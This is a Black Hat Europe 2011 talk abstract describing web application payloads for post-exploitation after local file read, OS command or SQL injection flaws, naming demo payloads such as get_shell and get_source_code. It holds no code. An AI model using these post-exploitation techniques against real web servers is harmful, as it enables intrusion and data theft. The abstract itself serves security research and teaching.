Web Application Payloads presented at Blackhat Europe 2011

by Andrès Pablo Riancho (Rapid7 ),

Tags: Security

Summary : Web Application Payloads are the evolution of old school system call payloads which are used in memory corruption exploits since the 70's. The basic problem solved by any payload is pretty simple: "I have _access_, what now?". In memory corruption exploits it's pretty easy to perform any specific task because after successful exploitation the attacker is able to control the CPU / memory and execute arbitrary system calls in order to create a new user or run an arbitrary command; but in the Web Application field, the attacker is restricted to the "system calls" that the vulnerable Web Application exposes:
* Local File Read - read()
* OS Commanding - exec()
* SQL Injection - read(), write() and possibly exec().
Web Application Payloads are small pieces of code that are run in the attackers box, and then translated by the Web application exploit to a combination of GET and POST requests to be sent to the remote web-server.
This talk will explain how we implemented these payloads, the tricks used for post exploitation, many demos with payloads such as get_source_code, list_processes, apache_config, get_shell, etc.